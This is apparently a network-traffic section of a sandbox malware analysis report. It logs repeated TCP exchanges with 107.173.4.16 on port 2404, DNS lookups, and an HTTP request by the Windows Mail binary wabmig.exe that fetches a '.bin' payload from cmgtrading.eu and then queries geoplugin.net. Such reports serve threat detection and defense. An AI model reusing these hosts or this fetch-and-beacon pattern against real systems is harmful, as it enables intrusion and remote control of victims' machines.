                                                                          Oct 8, 2024 00:40:28.366801023 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366805077 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366815090 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366815090 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366826057 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366837978 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366843939 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366874933 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.367257118 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.440618992 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440633059 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440645933 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440700054 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.440720081 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440732956 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440743923 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440757036 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440768003 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440777063 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.440807104 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.440911055 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440923929 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440936089 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440948009 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440959930 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440970898 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440972090 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.440983057 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440994978 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441004038 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441008091 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441020966 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441025019 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441032887 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441062927 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441112995 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441173077 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441185951 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441215038 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441277981 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441291094 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441303968 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441314936 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441318035 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441327095 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441343069 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441369057 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441576004 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441587925 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441598892 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441611052 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441622972 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441636086 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441644907 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441649914 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441670895 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441747904 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441760063 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441771984 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441782951 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441795111 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441797018 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441807985 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441823006 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441823959 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441836119 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441864967 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441934109 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441946030 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441957951 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441970110 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441986084 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441991091 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442009926 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442040920 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442054033 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442065001 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442075968 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442086935 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442094088 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442099094 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442112923 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442121029 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442126036 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442164898 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442511082 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442528009 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442539930 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442550898 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442563057 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442569971 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442574978 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442585945 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442589045 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442598104 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442606926 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442610979 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442621946 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442634106 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442634106 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442646980 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442658901 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442662001 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442675114 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442755938 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442815065 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442826986 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442841053 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442871094 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443059921 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443072081 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443083048 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443094015 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443099022 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443104982 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443116903 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443125963 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443128109 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443140984 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443154097 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443177938 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443281889 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443295002 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443319082 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443324089 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443337917 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443342924 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443350077 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443361998 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443367004 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443373919 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443396091 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443404913 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443409920 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443414927 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443420887 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443434000 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443445921 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443456888 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443460941 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443485022 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443495989 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443589926 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443702936 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443717003 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443727970 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443741083 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443751097 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443753004 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443766117 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443768978 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.443778038 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.443800926 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.444006920 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444019079 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444031000 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444036007 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.444042921 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444047928 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444052935 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.444055080 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444061041 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444066048 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444072962 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444175959 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.444204092 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444216013 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.444241047 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.446086884 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.523140907 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523262024 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523273945 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523286104 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523292065 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523297071 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523303986 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523348093 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.523375988 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.523701906 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523715019 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523725033 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523736000 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523746967 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523757935 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523768902 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523772001 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.523780107 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523780107 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.523792028 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523807049 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.523895979 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523906946 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523916960 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523929119 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523942947 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523947954 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.523953915 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523966074 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523977041 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523977041 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.523977041 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.523987055 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.523989916 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.523998022 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524003983 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524008036 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524017096 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.524019957 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524050951 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.524061918 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.524292946 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524305105 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524315119 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524327040 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524338007 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524341106 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.524348974 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524360895 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.524380922 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.524491072 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524502039 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524513006 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524523020 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524533033 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524535894 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.524545908 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524554968 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.524584055 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.524648905 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524667978 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524678946 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524688959 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.524714947 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.524743080 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.785710096 CEST8049983178.237.33.50192.168.2.10
                                                                          Oct 8, 2024 00:40:28.788275957 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:40:31.959860086 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:31.964818954 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.964844942 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.964854956 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.964921951 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:31.964921951 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:31.964926958 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.964942932 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.964953899 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.964963913 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.965272903 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.965282917 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.965379953 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.969830990 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.969881058 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.969985008 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.970001936 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.970011950 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.970077991 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:31.970168114 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:32.021315098 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:32.026487112 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:32.026541948 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:33.468108892 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:33.469665051 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:33.476845980 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:41:03.441665888 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:41:03.442881107 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:41:03.447798967 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:41:33.444567919 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:41:33.451450109 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:41:33.458749056 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:42:03.447173119 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:42:03.450278997 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:42:03.455205917 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:42:12.689186096 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:42:13.048310041 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:42:13.703174114 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:42:14.938918114 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:42:17.420542955 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:42:22.327544928 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:42:31.954519033 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:42:33.450278044 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:42:33.451569080 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:42:33.456513882 CEST240449982107.173.4.16192.168.2.10

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 8, 2024 00:40:22.706284046 CEST4958953192.168.2.101.1.1.1
                                                                          Oct 8, 2024 00:40:22.810601950 CEST53495891.1.1.1192.168.2.10
                                                                          Oct 8, 2024 00:40:27.046742916 CEST5084653192.168.2.101.1.1.1
                                                                          Oct 8, 2024 00:40:27.057245016 CEST53508461.1.1.1192.168.2.10

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Oct 8, 2024 00:40:22.706284046 CEST192.168.2.101.1.1.10xd41dStandard query (0)cmgtrading.euA (IP address)IN (0x0001)false
                                                                          Oct 8, 2024 00:40:27.046742916 CEST192.168.2.101.1.1.10xb7e7Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Oct 8, 2024 00:40:22.810601950 CEST1.1.1.1192.168.2.100xd41dNo error (0)cmgtrading.eu185.26.107.57A (IP address)IN (0x0001)false
                                                                          Oct 8, 2024 00:40:27.057245016 CEST1.1.1.1192.168.2.100xb7e7No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • cmgtrading.eu
                                                                          • geoplugin.net

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.1049980185.26.107.57803200C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 8, 2024 00:40:22.824076891 CEST174OUTGET /CubBVEODo227.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: cmgtrading.eu
                                                                          Cache-Control: no-cache
                                                                          Oct 8, 2024 00:40:23.505775928 CEST393INHTTP/1.1 301 Moved Permanently
                                                                          server: nginx
                                                                          date: Mon, 07 Oct 2024 22:40:23 GMT
                                                                          content-type: text/html
                                                                          content-length: 162
                                                                          location: https://cmgtrading.eu/CubBVEODo227.bin
                                                                          set-cookie: SERVID=A; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.1049983178.237.33.50803200C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 8, 2024 00:40:27.067260981 CEST71OUTGET /json.gp HTTP/1.1
                                                                          Host: geoplugin.net
                                                                          Cache-Control: no-cache
                                                                          Oct 8, 2024 00:40:27.786236048 CEST1170INHTTP/1.1 200 OK
                                                                          date: Mon, 07 Oct 2024 22:40:27 GMT
                                                                          server: Apache
                                                                          content-length: 962
                                                                          content-type: application/json; charset=utf-8
                                                                          cache-control: public, max-age=300
                                                                          access-control-allow-origin: *
